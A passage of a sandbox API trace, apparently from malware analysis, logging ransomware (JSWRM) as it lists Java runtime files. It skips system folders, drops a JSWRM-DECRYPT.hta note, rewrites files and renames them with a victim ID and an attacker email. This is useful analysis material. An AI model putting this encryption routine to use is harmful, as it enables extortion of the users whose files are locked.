RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0069.804] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\applet\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105ca28, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2044ab3d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231f40 [0069.804] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.804] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105ca28, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2044ab3d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.804] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.804] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.805] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2044ab3d, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x2044ab3d, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x2044ab3d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0069.805] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0069.805] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0069.805] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0069.805] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0069.805] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0069.805] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0069.805] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0069.805] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0069.805] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0069.805] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0069.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0069.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0069.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0069.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0069.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.805] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2044ab3d, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x2044ab3d, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x2044ab3d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0069.805] FindClose (in: hFindFile=0x231f40 | out: hFindFile=0x231f40) returned 1 [0069.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0069.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0069.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0069.805] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x562, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="calendars.properties", cAlternateFileName="CALEND~1.PRO")) returned 1 [0069.805] lstrcmpiW (lpString1="calendars.properties", lpString2=".") returned 1 [0069.805] lstrcmpiW (lpString1="calendars.properties", lpString2="..") returned 1 [0069.806] lstrcmpiW (lpString1="calendars.properties", lpString2="...") returned 1 [0069.806] lstrcmpiW (lpString1="calendars.properties", lpString2="windows") returned -1 [0069.806] lstrcmpiW (lpString1="calendars.properties", lpString2="recovery") returned -1 [0069.806] lstrcmpiW (lpString1="calendars.properties", lpString2="perflogs") returned -1 [0069.806] lstrcmpiW (lpString1="calendars.properties", lpString2="documents and settings") returned -1 [0069.806] lstrcmpiW (lpString1="calendars.properties", lpString2="$RECYCLE.BIN") returned 1 [0069.806] lstrcmpiW (lpString1="calendars.properties", lpString2="system volume information") returned -1 [0069.806] lstrcmpiW (lpString1="calendars.properties", lpString2="msocache") returned -1 [0069.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="calendars.properties", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0069.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0069.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="calendars.properties", cchWideChar=20, lpMultiByteStr=0x240ef8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="calendars.properties", lpUsedDefaultChar=0x0) returned 20 [0069.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="calendars.properties", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0069.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0069.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="calendars.properties", cchWideChar=20, lpMultiByteStr=0x240fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="calendars.properties", lpUsedDefaultChar=0x0) returned 20 [0069.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0069.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0069.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0069.806] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0069.806] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=1378) returned 1 [0069.807] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x560) returned 0x23fc98 [0069.807] ReadFile (in: hFile=0x454, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x560, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345ec04*=0x560, lpOverlapped=0x0) returned 1 [0069.808] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.808] WriteFile (in: hFile=0x454, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345ec00*=0x560, lpOverlapped=0x0) returned 1 [0069.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0069.808] CloseHandle (hObject=0x454) returned 1 [0069.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0069.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0069.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0069.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0069.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.809] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0069.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0069.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0069.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0069.809] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa7bbd53, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xaa7bbd53, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xaa80821a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2e56fa, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="charsets.jar", cAlternateFileName="")) returned 1 [0069.809] lstrcmpiW (lpString1="charsets.jar", lpString2=".") returned 1 [0069.809] lstrcmpiW (lpString1="charsets.jar", lpString2="..") returned 1 [0069.809] lstrcmpiW (lpString1="charsets.jar", lpString2="...") returned 1 [0069.809] lstrcmpiW (lpString1="charsets.jar", lpString2="windows") returned -1 [0069.809] lstrcmpiW (lpString1="charsets.jar", lpString2="recovery") returned -1 [0069.809] lstrcmpiW (lpString1="charsets.jar", lpString2="perflogs") returned -1 [0069.809] lstrcmpiW (lpString1="charsets.jar", lpString2="documents and settings") returned -1 [0069.809] lstrcmpiW (lpString1="charsets.jar", lpString2="$RECYCLE.BIN") returned 1 [0069.809] lstrcmpiW (lpString1="charsets.jar", lpString2="system volume information") returned -1 [0069.809] lstrcmpiW (lpString1="charsets.jar", lpString2="msocache") returned -1 [0069.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0069.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="charsets.jar", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="charsets.jar", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="charsets.jar", lpUsedDefaultChar=0x0) returned 12 [0069.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0069.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="charsets.jar", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="charsets.jar", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="charsets.jar", lpUsedDefaultChar=0x0) returned 12 [0069.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0069.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0069.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0069.810] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0069.810] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=3036922) returned 1 [0069.811] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0069.811] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0069.828] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.828] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0069.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.829] CloseHandle (hObject=0x454) returned 1 [0069.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0069.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0069.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0069.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0069.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0069.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23fa98 [0069.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.830] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0069.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0069.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0069.830] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x14983, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="classlist", cAlternateFileName="CLASSL~1")) returned 1 [0069.830] lstrcmpiW (lpString1="classlist", lpString2=".") returned 1 [0069.830] lstrcmpiW (lpString1="classlist", lpString2="..") returned 1 [0069.830] lstrcmpiW (lpString1="classlist", lpString2="...") returned 1 [0069.830] lstrcmpiW (lpString1="classlist", lpString2="windows") returned -1 [0069.830] lstrcmpiW (lpString1="classlist", lpString2="recovery") returned -1 [0069.830] lstrcmpiW (lpString1="classlist", lpString2="perflogs") returned -1 [0069.830] lstrcmpiW (lpString1="classlist", lpString2="documents and settings") returned -1 [0069.830] lstrcmpiW (lpString1="classlist", lpString2="$RECYCLE.BIN") returned 1 [0069.830] lstrcmpiW (lpString1="classlist", lpString2="system volume information") returned -1 [0069.830] lstrcmpiW (lpString1="classlist", lpString2="msocache") returned -1 [0069.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0069.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="classlist", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0069.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="classlist", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="classlist", lpUsedDefaultChar=0x0) returned 9 [0069.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0069.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0069.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="classlist", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0069.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="classlist", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="classlist", lpUsedDefaultChar=0x0) returned 9 [0069.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0069.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0069.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0069.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0069.831] CreateFileW 